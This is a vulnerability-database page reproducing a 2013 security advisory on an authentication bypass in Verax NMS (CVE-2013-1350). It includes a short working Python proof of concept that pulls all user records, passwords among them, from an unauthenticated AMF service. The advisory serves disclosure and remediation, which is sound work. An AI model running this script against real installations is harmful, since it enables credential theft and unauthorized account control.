Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormAndrew BrooksPACKETSTORM:120684
HistoryMar 07, 2013 - 12:00 a.m.

Verax NMS Authentication Bypass

2013-03-0700:00:00
Andrew Brooks
packetstormsecurity.com
18

0.002 Low

EPSS

Percentile

58.6%

JSON
`Verax NMS Authenication Bypass (CVE-2013-1350)  
  
I. BACKGROUND  
----------------------  
Verax NMS provides a service-oriented, unified  
management & monitoring of networks, applications  
and infrastructure enabling quick problem detection,  
root-cause analysis, reporting and automating recovery,  
reducing costs and shortening downtimes of IT service delivery.  
  
Source: http://www.veraxsystems.com/en/products/nms  
  
II. DESCRIPTION  
----------------------  
Verax NMS suffers from multiple authentication and  
authorization flaws which allow a remote attacker to  
add and delete users, change the passwords of other users,  
and access other critical application data. These issues  
stem from unauthenticated methods, such as userGroupService.getAllGroups(),  
which fail to validate that the user either 1) has ownership or  
access rights to the requested objects/resources and 2) fails to  
confirm whether or not the caller has properly authenticated to the  
application and still maintains a valid session.  
  
The below Python code can be used to test vulnerable installations. If  
successful, the response will contain an array of user objects which  
includes all user details, such as username, password, e-mail address, etc.  
----------------------  
#!/usr/bin/python  
  
#just based on http://www.pyamf.org/tutorials/general/client.html#basic-example  
from pyamf import AMF0, AMF3  
from pyamf.remoting.client import RemotingService  
  
client = RemotingService('http://installationurl/enetworkmanagementsystem-fds/messagebroker/amf',  
amf_version=AMF3)  
service = client.getService('userService')  
  
print service.getAllUsers()  
----------------------  
  
III. AFFECTED PRODUCTS  
----------------------  
All versions of Verax NMS prior to 2.1.0 are vulnerable.  
  
IV. RECCOMENDATION  
----------------------  
Users should upgrade to version 2.1.0 of Verax NMS.  
  
V. CREDIT  
----------------------  
This vulnerability was discovered by Andrew Brooks.  
  
VI. REFERENCES  
----------------------  
CVE-2013-1350  
http://download.veraxsystems.com/download/nms-2.1.0-release-notes.txt  
  
VII. TIMELINE  
----------------------  
1/10/2013 - Vendor notified  
1/11/2013 - Vendor acknowledges bug report  
2/20/2013 - Vulnerability remediated and pushed to mainline  
`

Related

securityvulns 2
cve 1
cvelist 1
prion 1
openvas 1
securityvulns
securityvulns
Verax NMS Authenication Bypass (CVE-2013-1350)
2013-03-11 00:00:00
Verax NMS multiple security vulnerabilities
2013-03-11 00:00:00
cve
cve
CVE-2013-1350
2020-01-30 14:15:00
cvelist
cvelist
CVE-2013-1350
2020-01-30 13:15:04
prion
prion
Security feature bypass
2020-01-30 14:15:00
openvas
openvas
Verax Network Management System Multiple Vulnerabilities
2013-03-15 00:00:00

0.002 Low

EPSS

Percentile

58.6%

JSON
Related for PACKETSTORM:120684
securityvulns2cve1cvelist1prion1openvas1